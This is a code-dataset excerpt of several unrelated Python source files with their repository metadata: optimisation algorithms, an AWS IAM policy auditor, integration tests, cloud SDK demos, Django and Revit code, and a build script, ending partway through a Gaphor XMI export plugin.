repo_name
stringlengths 7
94
| repo_path
stringlengths 4
237
| repo_head_hexsha
stringlengths 40
40
| content
stringlengths 10
680k
| apis
stringlengths 2
840k
|
---|---|---|---|---|
sauloal/cnidaria | scripts/venv/lib/python2.7/site-packages/cogent/maths/function_optimisation.py | fe6f8c8dfed86d39c80f2804a753c05bb2e485b4 | #!/usr/bin/env python
"""Algorthims for function optimisation
great_deluge() is a hillclimbing algorithm based on:
Gunter Dueck: New Optimization Heuristics, The Great Deluge Algorithm
and the Record-to-Record Travel. Journal of Computational Physics, Vol.
104, 1993, pp. 86 - 92
ga_evolve() is a basic genetic algorithm in which all internal functions can
be overridden
NOTE: both optimisation functions are generators.
"""
from numpy.random import normal
__author__ = "Daniel McDonald and Rob Knight"
__copyright__ = "Copyright 2007-2012, The Cogent Project"
__credits__ = ["Daniel McDonald", "Rob Knight"]
__license__ = "GPL"
__version__ = "1.5.3"
__maintainer__ = "Daniel McDonald"
__email__ = "[email protected]"
__status__ = "Production"
def _simple_breed(best, num, mutation_rate, random_f):
"""Returns num copies of parent with mutation_rate changes"""
result = []
score, parent = best
for child_number in range(num):
if random_f() <= mutation_rate:
child = parent.mutate()
result.append(child)
else:
result.append(parent)
return result
def _simple_score(child, target):
"""Returns the childs score as defined by the childs scoring function"""
return child.score(target)
def _simple_init(parent, num):
"""Creates a list parent copies"""
return [parent.copy() for i in range(num)]
def _simple_select(population, scores):
"""Returns a tuple: (best_score, best_child)"""
scored = zip(scores, population)
scored.sort()
return scored[0]
def great_deluge(a, step_factor=500, max_iter=100, max_total_iters=1000):
"""This generator makes random variations of the object a to minimize cost.
Yields are performed at the end of each iteration and a tuple containing
((iter_count, total_iters), a) is returned. iter_count is used to
kill the while loop in the event that no new objects are found with a
better cost. iter_count gets reset each time an object with a better
cost is found. total_iters will kill the while loop when the total
number of iterations through the loop reaches max_total_iters
Object a must implement methods cost() and perturb() for evaluating
the score and making mutations respectively. Usually, you'll want to
write a wrapper that passes these through to methods of an internal
data object, or functions acting on that object.
"""
water_level = curr_cost = a.cost() # can't be worse than initial guess
step_size = abs(water_level)/step_factor
iter_count = 0
total_iters = 0
while iter_count < max_iter and total_iters < max_total_iters:
new = a.perturb()
new_cost = new.cost()
if new_cost < water_level:
if new_cost < curr_cost:
water_level = max(curr_cost, water_level - step_size)
iter_count = 0 # WARNING: iter_count is reset here!
curr_cost = new_cost
a = new
else:
iter_count += 1
yield ((iter_count, total_iters), a)
total_iters += 1
def ga_evolve(parent, target, num, mutation_rate=0.01, score_f=_simple_score,
breed_f=_simple_breed, select_f=_simple_select,
init_f=_simple_init, random_f=normal, max_generations=1000):
"""Evolves a population based on the parent to the target
Parent must implement methods copy(), mutate(), and score(target) to be
used with the simple default functions.
Yields are performed at the end of each iteration and contain the tuple
(generation, best). The default functions return the tuple
(generation, (best_score, best_obj)).
Arguments:
parent: Object to create initial population from.
target: The goal of the evolution.
num: Population size.
mutation_rate: Rate at which objects in the population are mutated.
score_f: Function to score the object against the target.
breed_f: Function to create new population with mutations
select_f: Function to select best object(s) from the population
random_f: Function to be used in breed_f
max_generations: Kills while loop if max_generations is reached
Overload default functions:
score_f: Must take an object and a target score. Returns objects
score.
breed_f: Must take a tuple containing (scores, objects), the size of
population, a mutation rate and random function to use.
Returns a list containing the initial population. Default
function takes only the best object, but this may not be
desired behavior.
select_f: Must take a population and scores. Returns a tuple
containing the best scores and objects in the population.
Default function returns only the best score and object.
init_f: Must take an object and the size of the population. Returns
a list containing the starting population
"""
generation = 0
population = init_f(parent, num)
while generation < max_generations:
scores = [score_f(child, target) for child in population]
best = select_f(population, scores)
population = breed_f(best, num, mutation_rate, random_f)
yield (generation, best)
generation += 1
| [] |
jonathanbglass/parallel_prowler | collect_policies.py | 453774a69f078c7fce11c9bb72b6deab6fc04217 | import argparse
import boto3
import json
import logging
import os
from progressbar import ProgressBar
import sys
"""
Collects IAM Policies
Evaluates policies looking for badness (*.*, Effect:Allow + NotAction)
Need to add more tests/use cases
"""
def get_policies(profile):
session = boto3.session.Session(profile_name=profile)
myiam = session.client('iam')
marker = None
allPolicies = []
passcount = 1
while True:
pbar = ProgressBar('Collecting Policies')
print("Policy Collection, Pass Number: {}".format(passcount))
passcount += 1
if marker:
response_iterator = myiam.list_policies(OnlyAttached=True,
Marker=marker)
else:
response_iterator = myiam.list_policies(OnlyAttached=True)
for p in pbar(response_iterator['Policies']):
polVers = myiam.get_policy_version(
PolicyArn=p['Arn'], VersionId=p['DefaultVersionId'])
mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']}
allPolicies.append(mypol)
pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(mypol, default=str, indent=4))
pfl.close()
ae = myiam.list_entities_for_policy(PolicyArn=p['Arn'])
pfl = open(os.path.join('attachedentities/',
p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(ae, default=str, indent=4))
pfl.close()
try:
marker = response_iterator['Marker']
except KeyError:
break
print("\nTotal Policies: {}".format(len(allPolicies)))
pbar = ProgressBar('\tChecking for Dangerous Policies')
for p in pbar(allPolicies):
# This section looks for bad/dangerous patterns
# Pattern 1: Allow *.*
# AWSLambdaRole {
# 'Version': '2012-10-17',
# 'Statement': [
# {'Effect': 'Allow',
# 'Action': '*',
# 'Resource': ['*']
# }
# ]
# }
try:
q = p['PolicyVersion']['Document']['Statement'][0]
except Exception as e:
print("Problem parsing this policy: {}".format(p))
logging.debug("Problem parsing this policy: {}".format(p))
print(e)
continue
try:
if (q['Effect'] == "Allow" and '*' in q['Resource']
and '*' in q['Action']):
print("Review Dangerous Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
# Pattern 2: Allow: *, NotAction
# {'Version': '2012-10-17',
# 'Statement': [
# {
# 'Effect': 'Allow',
# 'NotAction': ['iam:*', 'organizations:*', 'account:*'],
# 'Resource': '*'
# },
# {
# 'Effect': 'Allow',
# 'Action': [ 'iam:CreateServiceLinkedRole',
# 'iam:DeleteServiceLinkedRole',
# 'iam:ListRoles',
# 'organizations:DescribeOrganization',
# 'account:ListRegions'
# ],
# 'Resource': '*'
# }
# ]}
# This policy blacklists all 'iam:*', 'organizations:*', and
# 'accounts:*' with the NotAction. Then it grants specific
# access in the next stanza ('iam:ListRoles', etc)
# The fatal flaw is that it grants access to everything else,
# like lambda or ec2 because of the "Allow" in the first stanza.
# This user can create an EC2 instance, attach an admin role to
# it, and login and give themselves access to Admin. Instance
# privilege escalation.
try:
if (q['NotAction'] and q['Effect'] == 'Allow'
and q['Resource'] == '*'):
print("Review Suspect Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
return
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global workingProfiles
workingProfiles = []
if not args.profile:
logging.info("Using AWS Default Profile")
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
exit(1)
else:
logging.info("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
return args.profile
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
if len(response) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-l", "--log",
help="Log Level")
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename='policyAssessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
profile = check_args_creds(args)
get_policies(profile)
if __name__ == "__main__":
# execute only if run as a script
main()
| [((19, 14, 19, 57), 'boto3.session.Session', 'boto3.session.Session', (), '', False, 'import boto3\n'), ((51, 11, 51, 59), 'progressbar.ProgressBar', 'ProgressBar', ({(51, 23, 51, 58): '"""\tChecking for Dangerous Policies"""'}, {}), "('\\tChecking for Dangerous Policies')", False, 'from progressbar import ProgressBar\n'), ((189, 13, 189, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((197, 4, 199, 39), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((25, 15, 25, 49), 'progressbar.ProgressBar', 'ProgressBar', ({(25, 27, 25, 48): '"""Collecting Policies"""'}, {}), "('Collecting Policies')", False, 'from progressbar import ProgressBar\n'), ((129, 8, 129, 49), 'logging.info', 'logging.info', ({(129, 21, 129, 48): '"""Using AWS Default Profile"""'}, {}), "('Using AWS Default Profile')", False, 'import logging\n'), ((138, 8, 138, 58), 'logging.info', 'logging.info', ({(138, 21, 138, 57): "('Using ' + args.profile + ' Profile')"}, {}), "('Using ' + args.profile + ' Profile')", False, 'import logging\n'), ((169, 8, 169, 32), 'logging.info', 'logging.info', ({(169, 21, 169, 31): '"""No users"""'}, {}), "('No users')", False, 'import logging\n'), ((131, 12, 131, 61), 'logging.error', 'logging.error', ({(131, 26, 131, 60): '"""Default credentials not working."""'}, {}), "('Default credentials not working.')", False, 'import logging\n'), ((140, 12, 140, 69), 'logging.error', 'logging.error', ({(140, 26, 140, 68): "('Profile ' + args.profile + ' not working')"}, {}), "('Profile ' + args.profile + ' not working')", False, 'import logging\n'), ((143, 12, 143, 64), 'logging.info', 'logging.info', ({(143, 25, 143, 63): "('Profile ' + args.profile + ' working')"}, {}), "('Profile ' + args.profile + ' working')", False, 'import logging\n'), ((153, 21, 153, 44), 'boto3.session.Session', 'boto3.session.Session', ({}, {}), '()', False, 'import boto3\n'), ((155, 12, 155, 55), 'logging.info', 'logging.info', ({(155, 25, 155, 54): "('Testing profile: ' + profile)"}, {}), "('Testing profile: ' + profile)", False, 'import logging\n'), ((156, 21, 156, 64), 'boto3.session.Session', 'boto3.session.Session', (), '', False, 'import boto3\n'), ((158, 8, 158, 43), 'logging.error', 'logging.error', ({(158, 22, 158, 42): '"""Error connecting: """'}, {}), "('Error connecting: ')", False, 'import logging\n'), ((159, 8, 159, 24), 'logging.error', 'logging.error', ({(159, 22, 159, 23): 'e'}, {}), '(e)', False, 'import logging\n'), ((165, 8, 165, 46), 'logging.error', 'logging.error', ({(165, 22, 165, 45): '"""Error listing users: """'}, {}), "('Error listing users: ')", False, 'import logging\n'), ((166, 8, 166, 24), 'logging.error', 'logging.error', ({(166, 22, 166, 23): 'e'}, {}), '(e)', False, 'import logging\n'), ((38, 23, 38, 73), 'os.path.join', 'os.path.join', ({(38, 36, 38, 47): '"""policies/"""', (38, 49, 38, 72): "p['PolicyName'] + '.json'"}, {}), "('policies/', p['PolicyName'] + '.json')", False, 'import os\n'), ((39, 22, 39, 62), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((42, 23, 43, 60), 'os.path.join', 'os.path.join', ({(42, 36, 42, 55): '"""attachedentities/"""', (43, 36, 43, 59): "p['PolicyName'] + '.json'"}, {}), "('attachedentities/', p['PolicyName'] + '.json')", False, 'import os\n'), ((44, 22, 44, 59), 'json.dumps', 'json.dumps', (), '', False, 'import json\n')] |
StackVista/stackstate-agent | test/molecule-role/molecule/integrations/tests/test_nagios.py | 843f66189fae107646c57f71fed962bdaab3b3be | import json
import os
import re
from testinfra.utils.ansible_runner import AnsibleRunner
import util
testinfra_hosts = AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('agent-integrations')
def _get_key_value(tag_list):
for key, value in (pair.split(':', 1) for pair in tag_list):
yield key, value
def _component_data(json_data, type_name, external_id_assert_fn, tags_assert_fn):
for message in json_data["messages"]:
p = message["message"]["TopologyElement"]["payload"]
if "TopologyComponent" in p and \
p["TopologyComponent"]["typeName"] == type_name and \
external_id_assert_fn(p["TopologyComponent"]["externalId"]):
data = json.loads(p["TopologyComponent"]["data"])
if tags_assert_fn(dict(_get_key_value(data["tags"]))):
return data
return None
def test_nagios_mysql(host):
def assert_topology():
topo_url = "http://localhost:7070/api/topic/sts_topo_process_agents?limit=1500"
data = host.check_output('curl "{}"'.format(topo_url))
json_data = json.loads(data)
with open("./topic-nagios-topo-process-agents.json", 'w') as f:
json.dump(json_data, f, indent=4)
external_id_pattern = re.compile(r"urn:container:/agent-integrations:.*")
components = [
{
"assertion": "Should find the nagios container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_nagios_1"
},
{
"assertion": "Should find the mysql container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_mysql_1"
}
]
for c in components:
print("Running assertion for: " + c["assertion"])
assert _component_data(
json_data=json_data,
type_name=c["type"],
external_id_assert_fn=c["external_id"],
tags_assert_fn=c["tags"],
) is not None
util.wait_until(assert_topology, 30, 3)
def test_container_metrics(host):
url = "http://localhost:7070/api/topic/sts_multi_metrics?limit=1000"
def wait_for_metrics():
data = host.check_output("curl \"%s\"" % url)
json_data = json.loads(data)
with open("./topic-nagios-sts-multi-metrics.json", 'w') as f:
json.dump(json_data, f, indent=4)
def get_keys(m_host):
return set(
''.join(message["message"]["MultiMetric"]["values"].keys())
for message in json_data["messages"]
if message["message"]["MultiMetric"]["name"] == "convertedMetric" and
message["message"]["MultiMetric"]["host"] == m_host
)
expected = {'nagios.http.size', 'nagios.ping.pl', 'nagios.http.time', 'nagios.current_load.load15',
'nagios.swap_usage.swap', 'nagios.host.pl', 'nagios.root_partition', 'nagios.current_users.users',
'nagios.current_load.load1', 'nagios.host.rta', 'nagios.ping.rta', 'nagios.current_load.load5',
'nagios.total_processes.procs'}
assert all([expectedMetric for expectedMetric in expected if expectedMetric in get_keys("agent-integrations")])
util.wait_until(wait_for_metrics, 180, 3)
| [((62, 4, 62, 43), 'util.wait_until', 'util.wait_until', ({(62, 20, 62, 35): 'assert_topology', (62, 37, 62, 39): '(30)', (62, 41, 62, 42): '(3)'}, {}), '(assert_topology, 30, 3)', False, 'import util\n'), ((88, 4, 88, 45), 'util.wait_until', 'util.wait_until', ({(88, 20, 88, 36): 'wait_for_metrics', (88, 38, 88, 41): '(180)', (88, 43, 88, 44): '(3)'}, {}), '(wait_for_metrics, 180, 3)', False, 'import util\n'), ((9, 18, 9, 70), 'testinfra.utils.ansible_runner.AnsibleRunner', 'AnsibleRunner', ({(9, 32, 9, 69): "os.environ['MOLECULE_INVENTORY_FILE']"}, {}), "(os.environ['MOLECULE_INVENTORY_FILE'])", False, 'from testinfra.utils.ansible_runner import AnsibleRunner\n'), ((33, 20, 33, 36), 'json.loads', 'json.loads', ({(33, 31, 33, 35): 'data'}, {}), '(data)', False, 'import json\n'), ((37, 30, 37, 81), 're.compile', 're.compile', ({(37, 41, 37, 80): '"""urn:container:/agent-integrations:.*"""'}, {}), "('urn:container:/agent-integrations:.*')", False, 'import re\n'), ((70, 20, 70, 36), 'json.loads', 'json.loads', ({(70, 31, 70, 35): 'data'}, {}), '(data)', False, 'import json\n'), ((23, 19, 23, 61), 'json.loads', 'json.loads', ({(23, 30, 23, 60): "p['TopologyComponent']['data']"}, {}), "(p['TopologyComponent']['data'])", False, 'import json\n'), ((35, 12, 35, 45), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((72, 12, 72, 45), 'json.dump', 'json.dump', (), '', False, 'import json\n')] |
papsebestyen/erudition | erudition/util.py | 35aa502a96189131baff714a6212eb56de2b1272 | import os
import sys
from contextlib import contextmanager
from invoke import UnexpectedExit
def git_commit(c, addstr, msg):
try:
c.run("git config --get user.email")
c.run("git config --get user.name")
except UnexpectedExit:
c.run('git config --local user.email "[email protected]"')
c.run('git config --local user.name "CI/CD"')
c.run(f'git add {addstr} && git commit -m "{msg}"')
@contextmanager
def cd_into(dirpath):
wd = os.getcwd()
os.chdir(dirpath)
sys.path.insert(0, str(dirpath))
yield
os.chdir(wd)
sys.path.pop(0)
| [((20, 9, 20, 20), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((21, 4, 21, 21), 'os.chdir', 'os.chdir', ({(21, 13, 21, 20): 'dirpath'}, {}), '(dirpath)', False, 'import os\n'), ((24, 4, 24, 16), 'os.chdir', 'os.chdir', ({(24, 13, 24, 15): 'wd'}, {}), '(wd)', False, 'import os\n'), ((25, 4, 25, 19), 'sys.path.pop', 'sys.path.pop', ({(25, 17, 25, 18): '(0)'}, {}), '(0)', False, 'import sys\n')] |
MeekoI/ais-sdk | python3/distortion_correct_aksk_demo.py | 76240abc49795e914988f3cafb6d08f60dbdcb4c | # -*- coding:utf-8 -*-
from ais_sdk.utils import encode_to_base64
from ais_sdk.utils import decode_to_wave_file
from ais_sdk.distortion_correct import distortion_correct_aksk
from ais_sdk.utils import init_global_env
import json
if __name__ == '__main__':
#
# access moderation distortion correct.post data by ak,sk
#
app_key = '*************'
app_secret = '************'
init_global_env(region='cn-north-1')
demo_data_url = 'https://ais-sample-data.obs.cn-north-1.myhuaweicloud.com/vat-invoice.jpg'
#call interface use the url correction is true means do not correction
result = distortion_correct_aksk(app_key, app_secret, "", demo_data_url, True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-1.png')
else:
print(result)
# call interface use the file
result = distortion_correct_aksk(app_key, app_secret, encode_to_base64('data/moderation-distortion.jpg'), '', True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-2.png')
else:
print(result) | [((14, 4, 14, 40), 'ais_sdk.utils.init_global_env', 'init_global_env', (), '', False, 'from ais_sdk.utils import init_global_env\n'), ((19, 13, 19, 82), 'ais_sdk.distortion_correct.distortion_correct_aksk', 'distortion_correct_aksk', ({(19, 37, 19, 44): 'app_key', (19, 46, 19, 56): 'app_secret', (19, 58, 19, 60): '""""""', (19, 62, 19, 75): 'demo_data_url', (19, 77, 19, 81): 'True'}, {}), "(app_key, app_secret, '', demo_data_url, True)", False, 'from ais_sdk.distortion_correct import distortion_correct_aksk\n'), ((20, 17, 20, 35), 'json.loads', 'json.loads', ({(20, 28, 20, 34): 'result'}, {}), '(result)', False, 'import json\n'), ((28, 17, 28, 35), 'json.loads', 'json.loads', ({(28, 28, 28, 34): 'result'}, {}), '(result)', False, 'import json\n'), ((22, 8, 22, 98), 'ais_sdk.utils.decode_to_wave_file', 'decode_to_wave_file', ({(22, 28, 22, 56): "result_obj['result']['data']", (22, 58, 22, 97): '"""data/moderation-distortion-aksk-1.png"""'}, {}), "(result_obj['result']['data'],\n 'data/moderation-distortion-aksk-1.png')", False, 'from ais_sdk.utils import decode_to_wave_file\n'), ((27, 58, 27, 108), 'ais_sdk.utils.encode_to_base64', 'encode_to_base64', ({(27, 75, 27, 107): '"""data/moderation-distortion.jpg"""'}, {}), "('data/moderation-distortion.jpg')", False, 'from ais_sdk.utils import encode_to_base64\n'), ((30, 8, 30, 98), 'ais_sdk.utils.decode_to_wave_file', 'decode_to_wave_file', ({(30, 28, 30, 56): "result_obj['result']['data']", (30, 58, 30, 97): '"""data/moderation-distortion-aksk-2.png"""'}, {}), "(result_obj['result']['data'],\n 'data/moderation-distortion-aksk-2.png')", False, 'from ais_sdk.utils import decode_to_wave_file\n')] |
Arpit8081/Phishtray_Edited_Version | exercise/migrations/0016_auto_20191025_1624.py | 9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8 | # Generated by Django 2.2.6 on 2019-10-25 16:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exercise', '0015_exerciseemailproperties_date_received'),
]
operations = [
migrations.AlterField(
model_name='exercise',
name='copied_from',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'),
),
]
| [((17, 18, 17, 130), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')] |
YKato521/ironpython-stubs | release/stubs.min/Autodesk/Revit/DB/__init___parts/GeomCombinationSet.py | b1f7c580de48528490b3ee5791b04898be95a9ae | class GeomCombinationSet(APIObject, IDisposable, IEnumerable):
"""
A set that contains GeomCombination objects.
GeomCombinationSet()
"""
def Clear(self):
"""
Clear(self: GeomCombinationSet)
Removes every item GeomCombination the set,rendering it empty.
"""
pass
def Contains(self, item):
"""
Contains(self: GeomCombinationSet,item: GeomCombination) -> bool
Tests for the existence of an GeomCombination within the set.
item: The element to be searched for.
Returns: The Contains method returns True if the GeomCombination is within the set,
otherwise False.
"""
pass
def Dispose(self):
""" Dispose(self: GeomCombinationSet,A_0: bool) """
pass
def Erase(self, item):
"""
Erase(self: GeomCombinationSet,item: GeomCombination) -> int
Removes a specified GeomCombination from the set.
item: The GeomCombination to be erased.
Returns: The number of GeomCombinations that were erased from the set.
"""
pass
def ForwardIterator(self):
"""
ForwardIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def GetEnumerator(self):
"""
GetEnumerator(self: GeomCombinationSet) -> IEnumerator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def Insert(self, item):
"""
Insert(self: GeomCombinationSet,item: GeomCombination) -> bool
Insert the specified element into the set.
item: The GeomCombination to be inserted into the set.
Returns: Returns whether the GeomCombination was inserted into the set.
"""
pass
def ReleaseManagedResources(self, *args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: GeomCombinationSet) """
pass
def ReverseIterator(self):
"""
ReverseIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a backward moving iterator to the set.
Returns: Returns a backward moving iterator to the set.
"""
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self, *args):
""" __iter__(self: IEnumerable) -> object """
pass
IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Test to see if the set is empty.
Get: IsEmpty(self: GeomCombinationSet) -> bool
"""
Size = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Returns the number of GeomCombinations that are in the set.
Get: Size(self: GeomCombinationSet) -> int
"""
| [] |
omribahumi/rainbow | rainbow/datasources/cfn_datasource.py | 17aad61231b1f1b9d0dca43979e2fa4c8a1603f3 | from rainbow.cloudformation import Cloudformation
from base import DataSourceBase
__all__ = ['CfnOutputsDataSource', 'CfnResourcesDataSource', 'CfnParametersDataSource']
class CfnDataSourceBase(DataSourceBase):
def __init__(self, data_source):
super(CfnDataSourceBase, self).__init__(data_source)
stack_name = data_source
region = Cloudformation.default_region
if ':' in data_source:
region, stack_name = data_source.split(':', 1)
cfn_connection = Cloudformation(region)
if not cfn_connection:
raise Exception('Invalid region %r' % (region,))
self.stack = cfn_connection.describe_stack(stack_name)
class CfnOutputsDataSource(CfnDataSourceBase):
datasource_name = 'cfn_outputs'
def __init__(self, data_source):
super(CfnOutputsDataSource, self).__init__(data_source)
self.data = {i.key: i.value for i in self.stack.outputs}
class CfnResourcesDataSource(CfnDataSourceBase):
datasource_name = 'cfn_resources'
def __init__(self, data_source):
super(CfnResourcesDataSource, self).__init__(data_source)
self.data = {r.logical_resource_id: r.physical_resource_id for r in self.stack.describe_resources()}
class CfnParametersDataSource(CfnDataSourceBase):
datasource_name = 'cfn_parameters'
def __init__(self, data_source):
super(CfnParametersDataSource, self).__init__(data_source)
self.data = {p.key: p.value for p in self.stack.parameters}
| [((17, 25, 17, 47), 'rainbow.cloudformation.Cloudformation', 'Cloudformation', ({(17, 40, 17, 46): 'region'}, {}), '(region)', False, 'from rainbow.cloudformation import Cloudformation\n')] |
idan/pypostbin | epio_commands/management/commands/epio_flush_redis.py | 61dd1c0960e8fb6e4460a5623971cbbc78a55ee7 | import redis
from bundle_config import config
from django.core.management.base import NoArgsCommand
class Command(NoArgsCommand):
help = 'Flushes all keys in redis.'
def handle_noargs(self, **options):
r = redis.Redis(host=config['redis']['host'], port=int(config['redis']['port']), password=config['redis']['password'])
r.flushall()
print "All redis keys flushed."
| [] |
zmxdream/FlexFlow | python/flexflow_cffi_build.py | 7ea50d71a02e853af7ae573d88c911511b3e82e0 | #!/usr/bin/env python
# Copyright 2020 Stanford University, Los Alamos National Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import os
import subprocess
def find_flexflow_header(ffhome_dir):
def try_prefix(prefix_dir):
flexflow_ch_path = os.path.join(prefix_dir, 'python', 'flexflow_c.h')
flexflow_cxxh_path = os.path.join(prefix_dir, 'include', 'model.h')
if os.path.exists(flexflow_ch_path) and os.path.exists(flexflow_cxxh_path):
flexflow_cxxh_dir = os.path.join(prefix_dir, 'include')
return flexflow_cxxh_dir, flexflow_ch_path
result = try_prefix(ffhome_dir)
if result:
return result
raise Exception('Unable to locate flexflow_c.h and flexflow.h header file')
def build(output_dir, libname, ffhome_dir):
flexflow_cxxh_dir, flexflow_ch_path = find_flexflow_header(ffhome_dir)
header = subprocess.check_output(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]).decode('utf-8')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'flexflow_cffi_header.py.in')) as f:
content = f.read()
content = content.format(header=repr(header), libname=repr(libname))
if output_dir is None:
output_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(output_dir, 'flexflow_cffi_header.py'), 'wb') as f:
f.write(content.encode('utf-8'))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--ffhome-dir', required=True)
parser.add_argument('--libname', required=True)
parser.add_argument('--output-dir', required=False)
args = parser.parse_args()
build(args.output_dir, args.libname, args.ffhome_dir)
| [((54, 13, 54, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((26, 27, 26, 77), 'os.path.join', 'os.path.join', ({(26, 40, 26, 50): 'prefix_dir', (26, 52, 26, 60): '"""python"""', (26, 62, 26, 76): '"""flexflow_c.h"""'}, {}), "(prefix_dir, 'python', 'flexflow_c.h')", False, 'import os\n'), ((27, 29, 27, 75), 'os.path.join', 'os.path.join', ({(27, 42, 27, 52): 'prefix_dir', (27, 54, 27, 63): '"""include"""', (27, 65, 27, 74): '"""model.h"""'}, {}), "(prefix_dir, 'include', 'model.h')", False, 'import os\n'), ((28, 11, 28, 43), 'os.path.exists', 'os.path.exists', ({(28, 26, 28, 42): 'flexflow_ch_path'}, {}), '(flexflow_ch_path)', False, 'import os\n'), ((28, 48, 28, 82), 'os.path.exists', 'os.path.exists', ({(28, 63, 28, 81): 'flexflow_cxxh_path'}, {}), '(flexflow_cxxh_path)', False, 'import os\n'), ((29, 32, 29, 67), 'os.path.join', 'os.path.join', ({(29, 45, 29, 55): 'prefix_dir', (29, 57, 29, 66): '"""include"""'}, {}), "(prefix_dir, 'include')", False, 'import os\n'), ((41, 13, 41, 100), 'subprocess.check_output', 'subprocess.check_output', ({(41, 37, 41, 99): "['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]"}, {}), "(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P',\n flexflow_ch_path])", False, 'import subprocess\n'), ((48, 37, 48, 63), 'os.path.realpath', 'os.path.realpath', ({(48, 54, 48, 62): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((50, 14, 50, 65), 'os.path.join', 'os.path.join', ({(50, 27, 50, 37): 'output_dir', (50, 39, 50, 64): '"""flexflow_cffi_header.py"""'}, {}), "(output_dir, 'flexflow_cffi_header.py')", False, 'import os\n'), ((43, 43, 43, 69), 'os.path.realpath', 'os.path.realpath', ({(43, 60, 43, 68): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
tuxcell/gaphor | gaphor/plugins/xmiexport/__init__.py | 22eb13479f589a0105ad25a11aed968e9ad932dc | """This plugin extends Gaphor with XMI export functionality."""
import logging
from gaphor.abc import ActionProvider, Service
from gaphor.core import action, gettext
from gaphor.plugins.xmiexport import exportmodel
from gaphor.ui.filedialog import FileDialog
logger = logging.getLogger(__name__)
class XMIExport(Service, ActionProvider):
def __init__(self, element_factory, file_manager, export_menu):
self.element_factory = element_factory
self.file_manager = file_manager
export_menu.add_actions(self)
def shutdown(self):
pass
@action(
name="file-export-xmi",
label=gettext("Export to XMI"),
tooltip=gettext("Export model to XMI (XML Model Interchange) format"),
)
def execute(self):
